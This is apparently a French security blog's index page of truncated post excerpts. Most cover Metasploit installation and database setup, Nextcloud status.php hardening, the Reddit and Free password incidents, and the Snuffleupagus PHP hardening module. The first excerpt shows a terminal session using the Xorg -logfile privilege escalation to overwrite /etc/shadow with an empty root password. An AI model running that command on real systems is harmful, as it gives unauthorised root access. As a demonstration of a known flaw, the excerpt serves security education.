Lien Mise en demeure de l'association 42

[Dev@localhost ~]$ id
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow----------. 1 root root 1241 Oct 10 01:15 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadowcat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (…)
"Un grand pouvoir implique de grandes responsabilités." oncle Ben.
Ce tutoriel ne se concentre que sur l'installation de metasploit-framework depuis github.
Ce tuto n'explique PAS comment utiliser metasploit.
Installez les pré-requis.
sudo apt update
sudo apt-get install -y ruby-dev libpq-dev libpcap-dev libsqlite3-dev postgresql git ruby-bundler build-essential patch ruby-dev zlib1g-dev liblzma-dev libgmp-dev
Créez le dossier pour accueillir les fichiers.
sudo mkdir /opt/metasploit
Accordez les bonnes permissions au dossier.
sudo chown $USER:root -R /opt/metasploit
sudo
(…)
musique d'ambiance : Best Melodic Dubstep Mix 2016
"Un grand pouvoir implique de grandes responsabilités." oncle Ben.
Nous allons voir ici comment utiliser la base de données PostgreSQL avec Metasploit.
Connectez vous à l'utilisateur dédié de postgresql.
sudo -s -u postgres
Créez utilisateur dédié pour metasploit.
createuser -d -P metasploit
La page status.php sert aux applications nextcloud clientes de vérifier le status en ligne du serveur.
Cette page peut aussi être utilisé afin de forger des Google Dork permettant de trouver des installations de nextcloud potentiellement plus fragile face au piratage.
Topic sur le forum de la communauté nextcloud : https://help.nextcloud.com/t/how-to-censor-status-php-page/38040
Il est fortement déconseillé de bloquer l'accès à cette page au risque de casser les clients de Nextcloud.
Ajoutez les lignes suivantes dans voter Backend (conseillé) (…)
Rien de grande ampleur cela dit, qu’on se rassure, ce super site web de partage de liens qu’est Reddit est toujours en vie !
C’était il y a deux semaines environ. L’attaque a consisté en l’interception de SMS. Reddit recommande donc de passer à l’authentification 2FA qui utilise un jeton (à la place du SMS).
Toutes les données de 2007 et antérieures ont fuitées, mais les mots de passe sont hashés et salés (ce qui veut dire si je (…)
Bienvenue en 2018,
Année de la mise en application du RGPD.
Année de la maturité en cybersécurité ? Pas pour tout le monde en tous cas.
Mon expérience d'hier soir m'a laissé perplexe. Sur la page de connexion des abonnés Freebox, ayant perdu mon mot de passe, j'ai renseigné les champs me permettant de le récupérer et … surprise, je l'ai récupéré … en clair par mail.
Nous sommes en 2018 et Free stocke les mots de passe de ses (…)
Snuffleupagus est un module pour PHP (version 7.0 et supérieures) qui a pour but d’augmenter drastiquement la difficulté des attaques contre les sites Web. Cela s’obtient, entre autres, via la désactivation de fonctions et de classes, et en fournissant un système de correctifs virtuels, permettant à l’administrateur de corriger des vulnérabilités spécifiques sans modifier le code PHP.
La version 0.3.0, disponible depuis le 18 juillet 2018, est un excellent prétexte pour parler de ce projet sur LinuxFr.org, avec des détails juteux en deuxième partie de dépêche.